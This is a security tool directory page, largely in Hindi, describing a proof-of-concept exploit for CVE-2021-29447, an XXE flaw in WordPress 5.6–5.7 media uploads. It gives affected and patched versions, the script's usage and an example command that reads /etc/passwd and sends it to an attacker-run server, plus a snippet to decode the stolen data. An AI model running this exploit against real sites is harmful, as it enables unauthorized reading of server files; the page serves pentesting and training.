Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-29447-PoC — वर्डप्रेस 5.6 मीडिया लाइब्रेरी भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/0xrar/cve-2021-29447-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHub0xrar/cve-2021-29447-poc

CVE-2021-29447-PoC

वर्डप्रेस 5.6 मीडिया लाइब्रेरी भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट

रिपॉजिटरी देखें
6113 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-29447 प्रूफ-ऑफ-कॉन्सेप्ट

╔═╗╦  ╦╔═╗
║  ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023

═══════════════════════════════════════════════════════════════════════════
[*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
[*] Affected versions: Wordpress 5.6 - 5.7
[*] Patched version: Wordpress 5.7.1
[*] Installation version: PHP 8
═══════════════════════════════════════════════════════════════════════════

CVE-2021-29447: एक उपयोगकर्ता जिसके पास फ़ाइलें अपलोड करने की क्षमता है (जैसे कोई लेखक), मीडिया लाइब्रेरी में XML पार्सिंग समस्या का फायदा उठाकर XXE हमले को अंजाम दे सकता है। इसके लिए WordPress इंस्टॉलेशन का PHP 8 का उपयोग करना आवश्यक है। सफल XXE हमले में आंतरिक फ़ाइलों तक पहुँच संभव है। इसे WordPress संस्करण 5.7.1 में ठीक किया गया है, साथ ही पुराने प्रभावित संस्करणों में एक मामूली रिलीज़ के माध्यम से।

यह स्क्रिप्ट समझने और चलाने में आसान है और WordPress मीडिया लाइब्रेरी पर XXE हमले का शोषण करने के लिए आवश्यक चरणों को स्वचालित करेगी।

उपयोग

usage: PoC.py [-h] [-l LHOST] [-p PORT] [-f FILE]

options:
  -h, --help            show this help message and exit
  -l LHOST, --lhost LHOST  your server ip address e.g. 10.0.2.15
  -p PORT, --port PORT  your server port e.g. 1337
  -f FILE, --file FILE  system file to read e.g. /etc/passwd

उदाहरण:

$ python3 PoC.py -l 10.0.2.15 -p 8000 -f /etc/passwd

बेस64 को डिकोड करने के लिए निम्नलिखित PHP स्निपेट का उपयोग/चलाएँ:

<?php
echo zlib_decode(base64_decode('base64_here'));
?>
$ php decode.php

  • संदर्भ:
    • https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
    • https://tryhackme.com/room/wordpresscve202129447
टूल डाउनलोड करें